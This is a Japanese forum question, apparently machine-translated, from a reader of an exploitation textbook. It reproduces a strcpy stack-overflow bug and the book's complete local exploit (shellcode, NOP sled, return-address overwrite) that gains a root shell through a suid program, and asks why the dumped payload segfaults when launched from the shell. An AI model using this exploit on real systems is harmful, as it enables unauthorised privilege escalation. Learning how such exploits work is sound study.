「ハッキング - 悪用の術」という本を読んでいます。スタック バッファ オーバーフローの例があります。
これは、攻撃されたプログラム「notesearch」のソースの一部です。
char searchstring[100];
// ...
if(argc > 1)
strcpy(searchstring, argv[1]); // <-- no length check
攻撃プログラム「exploit_notesearch」のソースは次のとおりです。
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\x31\xc0\x31\xdb\x31\xc9\x99\xb0\xa4\xcd\x80\x6a\x0b\x58\x51\x68"
"\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x51\x89\xe2\x53\x89"
"\xe1\xcd\x80";
int main(int argc, char *argv[]) {
unsigned int i, *ptr, ret, offset=270;
char *command, *buffer;
command = (char *) malloc(200);
bzero(command, 200); // zero out the new memory
strcpy(command, "./notesearch \'"); // start command buffer
buffer = command + strlen(command); // set buffer at the end
if(argc > 1) // set offset
offset = atoi(argv[1]);
ret = (unsigned int) &i - offset; // set return address
for(i=0; i < 160; i+=4) // fill buffer with return address
*((unsigned int *)(buffer+i)) = ret;
memset(buffer, 0x90, 60); // build NOP sled
memcpy(buffer+60, shellcode, sizeof(shellcode)-1);
strcat(command, "\'");
// <-- dumping full command string here
system(command); // run exploit
free(command);
}
explore_notesearch を実行すると、すべて正常に動作します。notesearch プログラムには suid 権限があるため、ルート シェルが取得されます。コマンド文字列には、呼び出すプログラムの名前、NOP スレッド、シェルコード、およびシェルコードへの戻りアドレスが含まれています。
悪用されたプログラムを gdb でデバッグして、悪用が正確にどのように機能するかを確認したいと考えています。これを行うために、コマンド文字列 (system() の呼び出しの直前) をファイル (dump.txt としましょう) にダンプしました。次に、同じ結果を得ようとしたシェルから、ダンプしたコマンド文字列を引数として悪用されたプログラムを直接呼び出しました。
プロンプト> $(cat dump.txt)
notesearch プログラムが開始されましたが、ルート シェルではなく、セグメンテーション エラーが発生しました。また、スクリプトを使用して非常に広い範囲でリターン アドレスを変更しました。
私の質問、違いは何ですか:
シェル経由でノート検索を開始する
システム経由でメモ検索を開始する
gdb を介して悪用されたプログラムをデバッグする別の方法も知っているかもしれません。